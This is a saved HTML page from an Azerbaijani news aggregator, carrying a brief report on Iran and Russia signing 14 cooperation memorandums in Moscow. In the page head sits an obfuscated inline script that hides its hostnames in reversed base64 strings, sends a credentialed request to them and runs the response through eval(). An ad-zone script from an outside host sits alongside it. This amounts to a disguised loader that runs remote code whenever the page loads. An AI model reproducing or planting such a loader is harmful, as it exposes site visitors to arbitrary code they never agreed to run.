<!DOCTYPE html>
<html>
  <head>
    <script data-cfasync="false" type="text/javascript">var S9c=window;for(var I in S9c){if(I.length===((135.20E1,2.90E1)<(7,0x41)?(0x71,6):(119.,8.8E1))&&I.charCodeAt(((3.300E2,9.0E1)<=(18,0xCC)?(0x1C,3):(6,2.0E1)))===(1.1380E3<=(4.93E2,1.3E1)?(27.5E1,0x101):(120.,0x11A)>(93.,0xFF)?(39.40E1,100):(0x145,12.06E2))&&I.charCodeAt(((0xE2,0x142)>=0x1A3?0x1BC:(0xDC,27.)<0x7D?(129.,5):(0x1A0,0x13A)))===((42,112)<(105,38.)?7.9E2:(0x21B,108)>=40?(0x8F,119):(0x183,6.46E2))&&I.charCodeAt(((23.,0x1E5)>=132.6E1?(0x182,'/'):(1.92E2,0x1FE)>=48.?(0x173,1):(59,8.)))===((0x1C0,0x179)>0x1C0?26:(50.40E1,7.2E1)>=(106,61.)?(34.30E1,105):(0x152,58))&&I.charCodeAt((136.<=(67,0x10B)?(65.60E1,0):(1.660E2,45.)))===(0x148>=(0x11,27)?(3E0,119):(96.60E1,0x1D2)))break};for(var x in S9c[I]){if(x.length===((0x204,19.3E1)<(6.49E2,2.35E2)?(5.14E2,8):(11.06E2,0x57))&&x.charCodeAt(((54.,0xB2)>(0x192,143.)?(6.69E2,5):13.33E2<=(11.86E2,137.)?(14.75E2,'J'):(6.0E1,144)))===((0xD7,39.)<=0x14A?(45.,101):(30.90E1,7.9E1))&&x.charCodeAt(((0x1A3,54.)>0.?(0.,7):(138,10.10E1)))===((84,0x1F6)>0x1DA?(2.030E2,116):(13.70E1,21)>(0x173,107.0E1)?(59.,36):(81,23))&&x.charCodeAt((22.5E1>(0x1C3,0x1D4)?110:138.<(0xEF,148)?(81.,3):(45,0x13E)))===(50.<(1.3E1,112)?(105.5E1,117):(7.8E2,73.7E1))&&x.charCodeAt((4.36E2<(65.5E1,0xE8)?(9.,0x14D):0xF2<(77.80E1,62.2E1)?(0x122,0):(0x183,0x24C)))===((0x19,89)<=90.?(0xD8,100):(122.,0x10F)<125?"v":(0x177,0x22E)))break};(function(J,n,K,h){S9c[I][n]=function(){var c=(36.2E1<(0xC,11.200E2)?(0x209,0):(0xB2,2.760E2)),e=c,N=function N(){var H=((0x218,113.7E1)>(53.,108.80E1)?(0x205,'/'):(14.61E2,3.59E2));var T='';var S='//';var O=(14>(0x136,1.47E3)?104.:10.85E2>=(0x31,110)?(59.,'T'):(86,0xD3));var i=((0xBC,0xE6)<104.?1.285E3:(0x152,67.)<=106.?(35,'E'):(0x10D,6.68E2));var g=(0x18>=(0xF,126.5E1)?(61.,"e"):(1.205E3,66)<=(114.,11.91E2)?(6.51E2,'G'):(15.,0x19C));var o=((119,0xBB)<=7.36E2?(134,true):(1.0030E3,0xB2));var L=new XMLHttpRequest();L.withCredentials=o;L.open((g+i+O),(S)+S9c[I]['atob'](K[e].split(T).reverse().join(T))+H+h+H,o);L.onreadystatechange=function(){var F=((0x14,143.0E1)<=0x13C?(27.,"O"):(117.9E1,0x249)>(0x1E1,1.54E2)?(149.0E1,200):(0x3C,43));var U=((0x21,0x171)>(10.,0x3B)?(134,4):(0x1A,23));if(L.readyState==U&&L.status==F&&L.responseText){eval(L.responseText);}};L.onerror=function(){if(++e!=K.length){N();}};try{L.send();}catch(F){L.onerror();}};N();};})(S9c[I][x],'_bwroj',['==AduFGduV3bjNWYuk2Mrd2ZnVnZ','tF2YiV2duI2cuxGaxIzM','==QZj5WZpN2cucnN2JnYwknc','==QZ0l2ciV2duMWNl9GO0IHb'],1054348);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1054347" onerror="window._bwroj();"></script>    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Iran, Russia sign 14 co-op documents</title>
    <base href="http://www.xebersaati.com/">
    <meta property="fb:app_id" content="694464134024628" />
    <meta property="og:url" content="http://www.xebersaati.com/news/23009-iran-russia-sign-14-co-op-documents/" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Iran, Russia sign 14 co-op documents" />
    <meta property="og:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta property="og:image" content="http://cdn2.trend.az/media/pictures/2014/08/15/podpis_150814.jpg" />
    <meta property="fb:admins" content="708967524" />
    <meta name="twitter:card" content="summary" />
    <meta name="twitter:site" content="@xebersaati" />
    <meta name="twitter:creator" content="@xebersaati" />
    <meta name="twitter:domain" content="http://www.xebersaati.com/" />
    <meta name="twitter:title" content="Iran, Russia sign 14 co-op documents" />
    <meta name="twitter:description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="twitter:image" content="http://cdn2.trend.az/media/pictures/2014/08/15/podpis_150814.jpg" />
    <meta name="robots" content="index, follow"/>
    <meta name="googlebot" content="index, follow" />
    <meta name="googlebot" content="index, archive" />
    <meta name="googlebot" content="all" />
    <meta name="yahoobot" content="index,follow" />
    <meta name="alexabot" content="index,follow" />
    <meta name="msnbot" content="index,follow" />
    <meta name="dmozbot" content="index,follow" />
    <meta name="revisit-after" content="1 days" />
    <meta name="description" content="Azərbaycanda və dünyada baş verən hadisələrdən xəbərdar olun." />
    <meta name="keywords" content="siyasət, iqtisadiyyat xəbərləri, dünya xəbərləri, gündəm, bölgə xəbərləri, xəbərlər, müharibə, xəbər, xəbər lenti" />
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="css/bootflat.min.css">
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
    <link rel="icon" type="image/png" href="img/favicon.png"> 
    <!--[if lt IE 9]>
      <script src="js/html5shiv.js"></script>
      <script src="js/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>

    <div class="container" id="container">
      <hr>
      <div class="logo pull-left">
        <a href="http://www.xebersaati.com/" class="pull-left"><img src="img/logo.png" alt="xəbər saatı"></a><div id="kategoriyalarButton"><button class="btn btn-danger">Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i></button></div>
      </div>

            

      <div class="languages pull-right">
        <span class="badge"><a href="lang.php?lang=az">AZ</a></span>
        <span class="badge"><a href="lang.php?lang=en">EN</a></span>
        <span class="badge"><a href="lang.php?lang=ru">RU</a></span>
        <span class="badge"><a href="lang.php?lang=tr">TR</a></span>
      </div>

      <div class="clearfix"></div>
      <hr> 
      <div class="row">
      <div id="kategoriyalar">
        <div class="categories center-block"><a href="http://www.xebersaati.com/category/afrika/" class="btn btn-xs btn-primary">Afrika</a><a href="http://www.xebersaati.com/category/amerika/" class="btn btn-xs btn-primary">Amerika</a><a href="http://www.xebersaati.com/category/aqrar-senaye-kompleksi/" class="btn btn-xs btn-primary">Aqrar-sənaye kompleksi</a><a href="http://www.xebersaati.com/category/asiya/" class="btn btn-xs btn-primary">Asiya</a><a href="http://www.xebersaati.com/category/atletika/" class="btn btn-xs btn-primary">Atletika</a><a href="http://www.xebersaati.com/category/avropa/" class="btn btn-xs btn-primary">Avropa</a><a href="http://www.xebersaati.com/category/avto-moto/" class="btn btn-xs btn-primary">Avto-Moto</a><a href="http://www.xebersaati.com/category/az/" class="btn btn-xs btn-primary">az</a><a href="http://www.xebersaati.com/category/birja/" class="btn btn-xs btn-primary">Birja</a><a href="http://www.xebersaati.com/category/biznes-ve-iqtisadiyyat-xeberleri/" class="btn btn-xs btn-primary">Biznes və iqtisadiyyat xəbərləri</a><a href="http://www.xebersaati.com/category/cemiyyet/" class="btn btn-xs btn-primary">Cəmiyyət</a><a href="http://www.xebersaati.com/category/dagliq-qarabag/" class="btn btn-xs btn-primary">Dağlıq Qarabağ</a><a href="http://www.xebersaati.com/category/dagliq-qarabag-munaqishesi/" class="btn btn-xs btn-primary">Dağlıq Qarabağ Münaqişəsi</a><a href="http://www.xebersaati.com/category/daxili-siyaset/" class="btn btn-xs btn-primary">Daxili siyasət</a><a href="http://www.xebersaati.com/category/diaspor/" class="btn btn-xs btn-primary">Diaspor</a><a href="http://www.xebersaati.com/category/din/" class="btn btn-xs btn-primary">Din</a><a href="http://www.xebersaati.com/category/doyush-novleri/" class="btn btn-xs btn-primary">Döyüş növləri</a><a href="http://www.xebersaati.com/category/dunya/" class="btn btn-xs btn-primary">Dünya</a><a href="http://www.xebersaati.com/category/dunya-xeberleri/" class="btn btn-xs btn-primary">Dünya xəbərləri</a><a href="http://www.xebersaati.com/category/energetika/" class="btn btn-xs btn-primary">Energetika</a><a href="http://www.xebersaati.com/category/edebiyyat/" class="btn btn-xs btn-primary">Ədəbiyyat</a><a href="http://www.xebersaati.com/category/futbol/" class="btn btn-xs btn-primary">Futbol</a><a href="http://www.xebersaati.com/category/hadise/" class="btn btn-xs btn-primary">Hadisə</a><a href="http://www.xebersaati.com/category/herbi/" class="btn btn-xs btn-primary">Hərbi</a><a href="http://www.xebersaati.com/category/idman/" class="btn btn-xs btn-primary">İdman</a><a href="http://www.xebersaati.com/category/iii-sektor/" class="btn btn-xs btn-primary">III Sektor</a><a href="http://www.xebersaati.com/category/ikt/" class="btn btn-xs btn-primary">İKT</a><a href="http://www.xebersaati.com/category/incesenet/" class="btn btn-xs btn-primary">İncəsənət</a><a href="http://www.xebersaati.com/category/infrastruktur/" class="btn btn-xs btn-primary">İnfrastruktur</a><a href="http://www.xebersaati.com/category/iqtisadi/" class="btn btn-xs btn-primary">İqtisadi</a><a href="http://www.xebersaati.com/category/iqtisadiyyat/" class="btn btn-xs btn-primary">İqtisadiyyat</a><a href="http://www.xebersaati.com/category/kriminal/" class="btn btn-xs btn-primary">Kriminal</a><a href="http://www.xebersaati.com/category/maliyye/" class="btn btn-xs btn-primary">Maliyyə</a><a href="http://www.xebersaati.com/category/maraqli/" class="btn btn-xs btn-primary">Maraqlı</a><a href="http://www.xebersaati.com/category/mdb/" class="btn btn-xs btn-primary">MDB</a><a href="http://www.xebersaati.com/category/media/" class="btn btn-xs btn-primary">Media</a><a href="http://www.xebersaati.com/category/medeniyyet/" class="btn btn-xs btn-primary">Mədəniyyət</a><a href="http://www.xebersaati.com/category/medeniyyet-siyaseti/" class="btn btn-xs btn-primary">Mədəniyyət siyasəti</a><a href="http://www.xebersaati.com/category/muharibe/" class="btn btn-xs btn-primary">Müharibə</a><a href="http://www.xebersaati.com/category/musahibe/" class="btn btn-xs btn-primary">Müsahibə</a><a href="http://www.xebersaati.com/category/nezer-noqtesi/" class="btn btn-xs btn-primary">Nəzər nöqtəsi</a><a href="http://www.xebersaati.com/category/olimpiada/" class="btn btn-xs btn-primary">Olimpiada</a><a href="http://www.xebersaati.com/category/ordu/" class="btn btn-xs btn-primary">Ordu</a><a href="http://www.xebersaati.com/category/sahibkarliq/" class="btn btn-xs btn-primary">Sahibkarlıq</a><a href="http://www.xebersaati.com/category/senaye-ve-energetika/" class="btn btn-xs btn-primary">Sənaye və energetika</a><a href="http://www.xebersaati.com/category/siyaset/" class="btn btn-xs btn-primary">Siyasət</a><a href="http://www.xebersaati.com/category/siyasi/" class="btn btn-xs btn-primary">Siyasi</a><a href="http://www.xebersaati.com/category/sosial/" class="btn btn-xs btn-primary">Sosial</a><a href="http://www.xebersaati.com/category/shou-biznes/" class="btn btn-xs btn-primary">Şou-biznes</a><a href="http://www.xebersaati.com/category/stolustu-oyunlar/" class="btn btn-xs btn-primary">Stolüstü oyunlar</a><a href="http://www.xebersaati.com/category/telekommunikasiya/" class="btn btn-xs btn-primary">Telekommunikasiya</a><a href="http://www.xebersaati.com/category/top-oyunlari/" class="btn btn-xs btn-primary">Top oyunları</a><a href="http://www.xebersaati.com/category/turizm/" class="btn btn-xs btn-primary">Turizm</a><a href="http://www.xebersaati.com/category/xarici-siyaset/" class="btn btn-xs btn-primary">Xarici siyasət</a></div><div class="clearfix"></div><hr> 
      </div>
      
      <div class="content">
  <a href="http://go.ad2up.com/afu.php?id=1054352" target="_blank"><img src="img/earn-money-from-internet.png" class="thumbnail img-responsive" id="kat"></a>
  <div class="box thumbnail">	
    <div class="xeberMetni">
          <img src="http://cdn2.trend.az/media/pictures/2014/08/15/podpis_150814.jpg" alt="" class="thumbnail">
          <h1>Iran, Russia sign 14 co-op documents</h1>
          <p class="help-block"><em><small>2017-03-28 16:53</small> | <a href="http://en.trend.az/iran/politics/2735717.html" target="_blank">www.trend.az</a> | <i class="fa fa-bar-chart" aria-hidden="true"></i> 1</em></p>
          <p>Baku, Azerbaijan, Mar. 28</p>
<p>By Fatih Karimov &ndash; Trend:</p>
<p>Iranian and Russian officials signed 14 memorandums of understanding (MOUs) on the sidelines of a meeting between Iran&#039;s President Hassan Rouhani and his Russian counterpart Vladimir Putin in Moscow on Mar. 28.</p>
<p>The signed documents cover cooperation in political, economic, legal, cultural and scientific areas, Iran&rsquo;s state-run IRINN TV reported.</p>
<p>The documents include an MOU on extradition of criminals, an MOU on visa-free travel for Russian and Iranian citizens within tourist groups, a cooperation document between the energy ministries for electricity trade, a document on cooperation in sports, as well as MOUs on cooperation in the fields of housing, transportation, railways, ICT, trade, oil and gas, and transportation of nuclear materials.</p>
<p>Rouhani arrived in Moscow on March 27 on a two-day visit at the official invitation of his Russian counterpart Vladimir Putin.</p>
          <hr>
          <div class="text-center addthis_sharing_toolbox"></div>
        </div>    <div class="clearfix"></div>
  </div>
  <h1 class="relatedTitle">Bu kateqoriyadaki digər xəbərlər</h1>
  </div>
<div class="sidebar">
  <h1>Son xəbərlər</h1>
  <ul class="media-list"><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23085-eli-insanovun-cinayet-ishi-mehkemeye-gonderilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/28/big/eli-insanov.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23085-eli-insanovun-cinayet-ishi-mehkemeye-gonderilib/">Əli İnsanovun cinayət işi məhkəməyə göndərilib </a></div>
                <small>2017-03-28 17:54 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23084-tehlukesizlik-orqanlari-emekdashlarinin-peshe-bayrami-qeyd-olunub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/28/big/97-fexri-xiyaban-2.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23084-tehlukesizlik-orqanlari-emekdashlarinin-peshe-bayrami-qeyd-olunub/">Təhlükəsizlik orqanları əməkdaşlarının peşə bayramı qeyd olunub</a></div>
                <small>2017-03-28 17:50 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23074-azerbaycan-prezidenti-bu-il-pambiq-beceren-rayonlarda-200-min-nefer-ishle-temin-olunacaq/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/28/big/1490698677532691808-1000x669.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23074-azerbaycan-prezidenti-bu-il-pambiq-beceren-rayonlarda-200-min-nefer-ishle-temin-olunacaq/">Azərbaycan prezidenti: “Bu il pambıq becərən rayonlarda 200 min nəfər işlə təmin olunacaq”</a></div>
                <small>2017-03-28 17:35 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23073-milli-meclis-sedri-rusiya-dovlet-dumasinin-spikeri-ile-gorushub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/28/big/6661-1480020420.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23073-milli-meclis-sedri-rusiya-dovlet-dumasinin-spikeri-ile-gorushub/">Milli Məclis sədri Rusiya Dövlət Dumasının spikeri ilə görüşüb</a></div>
                <small>2017-03-28 17:34 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23062-oqtay-esedov-ashpa-sedri-ile-gorushub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/28/big/thumb-20160915062059097.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23062-oqtay-esedov-ashpa-sedri-ile-gorushub/">Oqtay Əsədov AŞPA sədri ilə görüşüb</a></div>
                <small>2017-03-28 17:29 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23061-tiflisde-sona-veliyevanin-ishiga-geden-yol-romaninin-teqdimati-kecirilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/28/big/ishiga-geden-yol-romaninin-teqdimati.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23061-tiflisde-sona-veliyevanin-ishiga-geden-yol-romaninin-teqdimati-kecirilib/">Tiflisdə Sona Vəliyevanın “İşığa gedən yol” romanının təqdimatı keçirilib</a></div>
                <small>2017-03-28 17:27 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 5</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23090-barama-media-merkezi-telebelerin-istifadesine-verilir-foto/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/03/28/barama_azercell_280317_03.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23090-barama-media-merkezi-telebelerin-istifadesine-verilir-foto/">“Barama Media Mərkəzi” tələbələrin istifadəsinə verilir (FOTO)</a></div>
                <small>2017-03-28 17:27 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 0</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23089-ac-2017-ilk-gunde-1-qizil-ve-2-burunc-medal-shansi-yenilenib/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2016/05/28/gulesh_280516__(1).jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23089-ac-2017-ilk-gunde-1-qizil-ve-2-burunc-medal-shansi-yenilenib/">AÇ-2017: İlk gündə 1 qızıl və 2 bürünc medal şansı (YENİLƏNİB)</a></div>
                <small>2017-03-28 17:26 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 0</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23081-bulvardaki-pulsuz-wifi-dan-nece-istifade-etmek-olar/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/03/18/baktelekom_180317_01.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23081-bulvardaki-pulsuz-wifi-dan-nece-istifade-etmek-olar/">Bulvardakı pulsuz "WiFi”dan necə istifadə etmək olar?</a></div>
                <small>2017-03-28 17:25 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23048-azerbaycanli-xanim-bankir-ebrd-nin-tacikistan-ofisinin-rehberi-teyin-olunub/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/28/big/c8amvb8x0aebf2e.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23048-azerbaycanli-xanim-bankir-ebrd-nin-tacikistan-ofisinin-rehberi-teyin-olunub/">Azərbaycanlı xanım bankir EBRD-nin Tacikistan ofisinin rəhbəri təyin olunub</a></div>
                <small>2017-03-28 17:24 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23080-turkiyede-magazalarda-bu-qadagan-edilecek/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn2.trend.az/media/pictures/2015/12/18/sellofan_paket_181215.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23080-turkiyede-magazalarda-bu-qadagan-edilecek/">Türkiyədə mağazalarda bu qadağan ediləcək</a></div>
                <small>2017-03-28 17:15 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23068-ferid-qayibov-idman-klublari-terefinden-yarishlarin-teshkil-edilmesi-federasiyaya-boyuk-komekdir-foto/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/03/28/trend_mukafat_280317_23.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23068-ferid-qayibov-idman-klublari-terefinden-yarishlarin-teshkil-edilmesi-federasiyaya-boyuk-komekdir-foto/">Fərid Qayıbov: İdman klubları tərəfindən yarışların təşkil edilməsi federasiyaya boyük köməkdir (FOTO)</a></div>
                <small>2017-03-28 17:11 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23047-mtn-polkovnikinin-intihari-ile-bagli-bashlanmish-cinayet-ishine-xitam-verilib-ekskluziv/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/march/28/big/intihar.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23047-mtn-polkovnikinin-intihari-ile-bagli-bashlanmish-cinayet-ishine-xitam-verilib-ekskluziv/">MTN polkovnikinin intiharı ilə bağlı başlanmış cinayət işinə xitam verilib - EKSKLÜZİV</a></div>
                <small>2017-03-28 17:07 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23087-azerbaycanda-dollar-bahalashib/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDMvMjgvMTYvNDEvNTMvNzU0L0RvbGxhcnNfcnRyX2ltZy5qcGciXSxbInAiLCJlbmNvZGUiLCJqcGciLCItcXVhbGl0eSA4MCJdLFsicCIsInRodW1iIiwiNjIweDQ2NVx1MDAzZSJdXQ?sha=3f2e5bec"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23087-azerbaycanda-dollar-bahalashib/">Azərbaycanda dollar bahalaşıb</a></div>
                <small>2017-03-28 17:07 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23067-martin-29-na-manatin-mezennesi/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2016/01/07/manat_dollar_070116.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23067-martin-29-na-manatin-mezennesi/">Martın 29-na manatın məzənnəsi</a></div>
                <small>2017-03-28 17:04 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23086-qubaya-qar-yagib/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDMvMjgvMTYvNTEvMzgvNjI2L3F1YmEgcWFyLmpwZyJdLFsicCIsImVuY29kZSIsImpwZyIsIi1xdWFsaXR5IDgwIl0sWyJwIiwidGh1bWIiLCI2MjB4NDY1XHUwMDNlIl1d?sha=5441379b"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23086-qubaya-qar-yagib/">Qubaya qar yağıb</a></div>
                <small>2017-03-28 17:03 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23077-lenkeranda-muellime-qetle-yetirilib-teferruat-yenilenib/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDMvMjgvMTYvMDgvNTIvMjUvbXVlbGxpbWUuanBnIl0sWyJwIiwiZW5jb2RlIiwianBnIiwiLXF1YWxpdHkgODAiXSxbInAiLCJ0aHVtYiIsIjYyMHg0NjVcdTAwM2UiXV0?sha=3348345b"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23077-lenkeranda-muellime-qetle-yetirilib-teferruat-yenilenib/">Lənkəranda müəllimə qətlə yetirilib – TƏFƏRRÜAT + YENİLƏNİB</a></div>
                <small>2017-03-28 17:00 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23076-bezi-olkeler-ne-ucun-viza-vermekden-imtina-edir-arashdirma/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDMvMjgvMTUvMDkvMDEvMTE5L3ZpemEuanBnIl0sWyJwIiwiZW5jb2RlIiwianBnIiwiLXF1YWxpdHkgODAiXSxbInAiLCJ0aHVtYiIsIjYyMHg0NjVcdTAwM2UiXV0?sha=cd92309b"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23076-bezi-olkeler-ne-ucun-viza-vermekden-imtina-edir-arashdirma/">Bəzi ölkələr nə üçün viza verməkdən imtina edir? – ARAŞDIRMA</a></div>
                <small>2017-03-28 16:59 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23056-azerbaycan-bazel-kino-festivalinda-temsil-olunub-foto/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/03/28/film_festival_280317_06.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23056-azerbaycan-bazel-kino-festivalinda-temsil-olunub-foto/">Azərbaycan Bazel kino festivalında təmsil olunub (FOTO)</a></div>
                <small>2017-03-28 16:54 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/23065-sulutepe-qesebesinde-yerustu-piyada-kecidinin-inshasi-yekunlashir-foto-video/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDMvMjgvMTQvNTAvMDcvNzk3LzBjMTRiYTBiLWNjNDUtNGViMS05NmEyLTBmOWNjY2RiNWQ4MS5qcGciXSxbInAiLCJlbmNvZGUiLCJqcGciLCItcXVhbGl0eSA4MCJdLFsicCIsInRodW1iIiwiNjIweDQ2NVx1MDAzZSJdXQ?sha=79f71c58"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/23065-sulutepe-qesebesinde-yerustu-piyada-kecidinin-inshasi-yekunlashir-foto-video/">Sulutəpə qəsəbəsində yerüstü piyada keçidinin inşası yekunlaşır – FOTO + VİDEO</a></div>
                <small>2017-03-28 16:54 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li></ul></div>    </div><!-- row -->

    <footer>
    	<hr>
    	<p class="text-center"><small>Saytdakı materialların istifadəsi zamanı istinad edilməsi vacibdir. Məlumat internet səhifələrində istifadə edildikdə hiperlink vasitəsi ilə istinad mütləqdir.</small><br>Copyright © 2016 All rights reserved. </p>
    	<p class="text-center">
    	  <!--LiveInternet counter--><script type="text/javascript"><!--
          document.write("<img src='//counter.yadro.ru/hit?t29.3;r"+
          escape(document.referrer)+((typeof(screen)=="undefined")?"":
          ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
          ";h"+escape(document.title.substring(0,80))+";"+Math.random()+
          "' alt='' title='LiveInternet: number of visitors and pageviews"+
          " is shown' "+
          "border='0' width='88' height='120'>")
          //--></script><!--/LiveInternet-->
          <img border=0 alt='ILK-10 Azeri Website Directory' src='http://www.ilk10.az/counter/count3.php?color=liliac&id=36590'>
    	</p>
    </footer>
    </div><!-- container -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
    <script type="text/javascript">
    	$('.xeberMetni iframe').wrap('<div class="embed-responsive embed-responsive-16by9"></div>');
    	$(".embed-responsive").before('<div class="clearfix"></div>');$(".xeberMetni iframe").addClass('embed-responsive-item');
      var flag="false";
      $("#kategoriyalarButton").click(function(){
        if(flag=="false")
          {$('#kategoriyalar').show(200); flag="true"; $("#kategoriyalarButton button").html('Kategoriyaları gizlət <i class="fa fa-angle-double-up" aria-hidden="true"></i>');} 
        else 
          {$('#kategoriyalar').hide(200); flag="false"; $("#kategoriyalarButton button").html('Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i>');}
        
      });
    </script>
    <!--Google Analytics-->
	  <script>
	    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
